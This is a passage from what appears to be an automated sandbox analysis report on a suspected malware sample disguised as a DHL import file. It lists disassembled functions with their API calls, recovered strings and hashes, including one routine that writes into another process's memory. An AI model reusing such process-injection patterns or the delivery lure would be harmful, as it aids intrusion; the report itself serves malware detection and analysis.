                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 386f99a617e1c9b71c11fd0197185ecb68e2aaa46f920de365aaff7fe680e903
                                                                                          • Instruction ID: 17de69f23684e2d73cac8cad46a0bb8cded1ddc7c5973d54b0a93cff1f477ee5
                                                                                          • Opcode Fuzzy Hash: 386f99a617e1c9b71c11fd0197185ecb68e2aaa46f920de365aaff7fe680e903
                                                                                          • Instruction Fuzzy Hash: 51016072801B199FC7309F66D890817FBF5FE502153158A3FD29692A31C7B1A955DE80
                                                                                          Function 0080D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 0080D752
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • _free.LIBCMT ref: 0080D764
                                                                                          • _free.LIBCMT ref: 0080D776
                                                                                          • _free.LIBCMT ref: 0080D788
                                                                                          • _free.LIBCMT ref: 0080D79A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: ee86defe5ffc14140aadef990a15bc8130be1fc1d8440702343e5bf1e57a808b
                                                                                          • Instruction ID: 798073c86e25348fff9eb8431da84cde441a441d978e1e6d5a7e93b7317ad37d
                                                                                          • Opcode Fuzzy Hash: ee86defe5ffc14140aadef990a15bc8130be1fc1d8440702343e5bf1e57a808b
                                                                                          • Instruction Fuzzy Hash: 60F0FF32545304ABC6A1FBA8FDC5D167BDDFB447107A80806F048E7591C761FC8086A5
                                                                                          Function 00835C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00835C58
                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00835C6F
                                                                                          • MessageBeep.USER32(00000000), ref: 00835C87
                                                                                          • KillTimer.USER32(?,0000040A), ref: 00835CA3
                                                                                          • EndDialog.USER32(?,00000001), ref: 00835CBD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3741023627-0
                                                                                          • Opcode ID: e0d1a6b3b4dd33365b4cbf9be3b61b80daa110f9946e86666c41945228daa90e
                                                                                          • Instruction ID: c3a677c5b9e5c22dd3d1f49c401af6895554385761270cdae847cb4af85c1e60
                                                                                          • Opcode Fuzzy Hash: e0d1a6b3b4dd33365b4cbf9be3b61b80daa110f9946e86666c41945228daa90e
                                                                                          • Instruction Fuzzy Hash: DF01D130500B04ABEB205B10DD8EFA677B8FB10B09F01216EE283A14E0DBF4A985CA90
                                                                                          Function 008022A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 008022BE
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • _free.LIBCMT ref: 008022D0
                                                                                          • _free.LIBCMT ref: 008022E3
                                                                                          • _free.LIBCMT ref: 008022F4
                                                                                          • _free.LIBCMT ref: 00802305
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 791b7c022a60a9307b023e4da6fcb7667d7fa4071fa54727f0195102f4e241b3
                                                                                          • Instruction ID: a1ef0f4eb3f930f7ee23cbf5c6c723c031a8f656ebb97baa2b708eeb69700f17
                                                                                          • Opcode Fuzzy Hash: 791b7c022a60a9307b023e4da6fcb7667d7fa4071fa54727f0195102f4e241b3
                                                                                          • Instruction Fuzzy Hash: 73F05E748101208FDA52FF98BC09E483F64F71A760B54051BF414E36F5DBB14811AFE5
                                                                                          Function 007E95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EndPath.GDI32(?), ref: 007E95D4
                                                                                          • StrokeAndFillPath.GDI32(?,?,008271F7,00000000,?,?,?), ref: 007E95F0
                                                                                          • SelectObject.GDI32(?,00000000), ref: 007E9603
                                                                                          • DeleteObject.GDI32 ref: 007E9616
                                                                                          • StrokePath.GDI32(?), ref: 007E9631
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                          • String ID:
                                                                                          • API String ID: 2625713937-0
                                                                                          • Opcode ID: 6063b79698ecb120a1a304c8a4097a146597b14e11bbd395a2f4b1e57d414556
                                                                                          • Instruction ID: 7052ec66d029e5cdb85ef0d06d5906d5383aa52d89948bf6e85a39184c0c060a
                                                                                          • Opcode Fuzzy Hash: 6063b79698ecb120a1a304c8a4097a146597b14e11bbd395a2f4b1e57d414556
                                                                                          • Instruction Fuzzy Hash: 3CF0AF31006644EBEF125F26EC1C7B63F60BB06322F488215F565554F0D77489A1CF21
                                                                                          Function 00800F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$_free
                                                                                          • String ID: a/p$am/pm
                                                                                          • API String ID: 3432400110-3206640213
                                                                                          • Opcode ID: 02b08537a7351cd366992b2428e0f9d5926f9288d4c23efb178de6a2abebed41
                                                                                          • Instruction ID: 1c836e7f5e735a5e54f3d18c6fd90ca6eb019a912f546b5b9861ff2cac3f5bcb
                                                                                          • Opcode Fuzzy Hash: 02b08537a7351cd366992b2428e0f9d5926f9288d4c23efb178de6a2abebed41
                                                                                          • Instruction Fuzzy Hash: 4ED1DF31A0020ADACFA89F68CC8DABAB7B5FF05324F254159E541DBBD0D3799D80CB91
                                                                                          Function 00857B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007F0242: EnterCriticalSection.KERNEL32(008A070C,008A1884,?,?,007E198B,008A2518,?,?,?,007D12F9,00000000), ref: 007F024D
                                                                                            • Part of subcall function 007F0242: LeaveCriticalSection.KERNEL32(008A070C,?,007E198B,008A2518,?,?,?,007D12F9,00000000), ref: 007F028A
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 007F00A3: __onexit.LIBCMT ref: 007F00A9
                                                                                          • __Init_thread_footer.LIBCMT ref: 00857BFB
                                                                                            • Part of subcall function 007F01F8: EnterCriticalSection.KERNEL32(008A070C,?,?,007E8747,008A2514), ref: 007F0202
                                                                                            • Part of subcall function 007F01F8: LeaveCriticalSection.KERNEL32(008A070C,?,007E8747,008A2514), ref: 007F0235
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                          • String ID: 5$G$Variable must be of type 'Object'.
                                                                                          • API String ID: 535116098-3733170431
                                                                                          • Opcode ID: ddff113909ae2cc90f3a7b8b8fd61ee5b4ac0143c3dc035a26ff00d5f3547f4e
                                                                                          • Instruction ID: a94d05912d9ab68d8eb276054d78128bb4fbabe21a42a23e8d9bd06dd792209f
                                                                                          • Opcode Fuzzy Hash: ddff113909ae2cc90f3a7b8b8fd61ee5b4ac0143c3dc035a26ff00d5f3547f4e
                                                                                          • Instruction Fuzzy Hash: 0C917870A04209EFCB14EF98E8959ADB7B2FF49305F108059F8069B392DB31AE49CB51
                                                                                          Function 00805AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: JO}
                                                                                          • API String ID: 0-3675885391
                                                                                          • Opcode ID: 6316b3e555bf94de1b5db3ab2258e5385b9e6a1f865a68320b075bf819b5b675
                                                                                          • Instruction ID: 285469eba109f78484ec83146b2b596f535ea7f78b409ca84dd688364125f06a
                                                                                          • Opcode Fuzzy Hash: 6316b3e555bf94de1b5db3ab2258e5385b9e6a1f865a68320b075bf819b5b675
                                                                                          • Instruction Fuzzy Hash: 2D518C71A00A099BEB619FA8CC49ABFBBB8FF05324F14005AE405E72D1DB759A018F71
                                                                                          Function 00832716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0083B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008321D0,?,?,00000034,00000800,?,00000034), ref: 0083B42D
                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00832760
                                                                                            • Part of subcall function 0083B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0083B3F8
                                                                                            • Part of subcall function 0083B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0083B355
                                                                                            • Part of subcall function 0083B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00832194,00000034,?,?,00001004,00000000,00000000), ref: 0083B365
                                                                                            • Part of subcall function 0083B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00832194,00000034,?,?,00001004,00000000,00000000), ref: 0083B37B
                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008327CD
                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0083281A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                          • String ID: @
                                                                                          • API String ID: 4150878124-2766056989
                                                                                          • Opcode ID: 1101d721f0fe843243aa266d9d2124afc27d664126daca2d4c3fd8275625b129
                                                                                          • Instruction ID: a5130c0e9351b15351acc8a8fb1407ec78c91ac4ced3c1d7fbe7662c591252aa
                                                                                          • Opcode Fuzzy Hash: 1101d721f0fe843243aa266d9d2124afc27d664126daca2d4c3fd8275625b129
                                                                                          • Instruction Fuzzy Hash: 28410C76900218BFDB10DBA8CD45AEEBBB8FF49700F104099FA55B7181DB706E45CBA1
                                                                                          Function 0080172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe,00000104), ref: 00801769
                                                                                          • _free.LIBCMT ref: 00801834
                                                                                          • _free.LIBCMT ref: 0080183E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$FileModuleName
                                                                                          • String ID: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe
                                                                                          • API String ID: 2506810119-655734387
                                                                                          • Opcode ID: c543f436d1667fa1613bb4f863cb20123a5c8705121373921888259cda0c51b5
                                                                                          • Instruction ID: 5028516117bb0f1259f8a283def62f7c3dba9a113cda2fbf4d5668144b49a604
                                                                                          • Opcode Fuzzy Hash: c543f436d1667fa1613bb4f863cb20123a5c8705121373921888259cda0c51b5
                                                                                          • Instruction Fuzzy Hash: 00314D75A40218EBDF61DF999C89E9EBBFCFB85320F144166F904D7291D6B08E40CB91
                                                                                          Function 0083C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0083C306
                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 0083C34C
                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008A1990,00D95280), ref: 0083C395
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                          • String ID: 0
                                                                                          • API String ID: 135850232-4108050209
                                                                                          • Opcode ID: 144aaea9930df973bafe29dc321132f10443a7ef8d703ee9931887462c20a9a9
                                                                                          • Instruction ID: 81f5ce0547ea88294ed2b9c300935bbda8a4c7dcf387416fbbc5b7070aa2a4ca
                                                                                          • Opcode Fuzzy Hash: 144aaea9930df973bafe29dc321132f10443a7ef8d703ee9931887462c20a9a9
                                                                                          • Instruction Fuzzy Hash: 86417C712043019FD720DF29D885B6ABBE4FBC5324F148A1EF9A5E7391D770A904CB92
                                                                                          Function 00864416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0086CC08,00000000,?,?,?,?), ref: 008644AA
                                                                                          • GetWindowLongW.USER32 ref: 008644C7
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008644D7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long
                                                                                          • String ID: SysTreeView32
                                                                                          • API String ID: 847901565-1698111956
                                                                                          • Opcode ID: 50d16688279d56d080b4ab4a974d48e19c9ffd9436b14e7e52aec1b9ce7291cb
                                                                                          • Instruction ID: 5dac5f1087a3714ae5e33104e76a6fc5837200b6a09f05684b1269ec5f75fdfb
                                                                                          • Opcode Fuzzy Hash: 50d16688279d56d080b4ab4a974d48e19c9ffd9436b14e7e52aec1b9ce7291cb
                                                                                          • Instruction Fuzzy Hash: 80319E31211205ABDF219E38DC4ABEA7BA9FB09324F225315F975E21D0DB74EC509754
                                                                                          Function 0085304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0085335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00853077,?,?), ref: 00853378
                                                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
                                                                                          • _wcslen.LIBCMT ref: 0085309B
                                                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00853106
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                          • String ID: 255.255.255.255
                                                                                          • API String ID: 946324512-2422070025
                                                                                          • Opcode ID: 92b6845eb639716efdb748e01be1ad17feae7cb275e816d5e05a83c75075622b
                                                                                          • Instruction ID: 9afe7efc505d47977a941e3b75606205cf73ac66b98bac601defc47a8df6c8b0
                                                                                          • Opcode Fuzzy Hash: 92b6845eb639716efdb748e01be1ad17feae7cb275e816d5e05a83c75075622b
                                                                                          • Instruction Fuzzy Hash: AB31B235200605DFCB20CF68C485AAAB7E0FF54399F248059E915CB392DB71EE49C760
                                                                                          Function 00863EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00863F40
                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00863F54
                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00863F78
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window
                                                                                          • String ID: SysMonthCal32
                                                                                          • API String ID: 2326795674-1439706946
                                                                                          • Opcode ID: bf114aa92667cd332aca4d371326fb6eb85f179cb47ad1e68f52ee3e24db6842
                                                                                          • Instruction ID: a32d024fce4361d7e9c64bbf5bad2c9b5a727383bfb336b2117dc0a107e8d478
                                                                                          • Opcode Fuzzy Hash: bf114aa92667cd332aca4d371326fb6eb85f179cb47ad1e68f52ee3e24db6842
                                                                                          • Instruction Fuzzy Hash: C0219F32610219BBDF119F54DC46FEA3B79FB48714F120214FA55AB1D0DAB5A9508BA0
                                                                                          Function 00864653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00864705
                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00864713
                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0086471A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
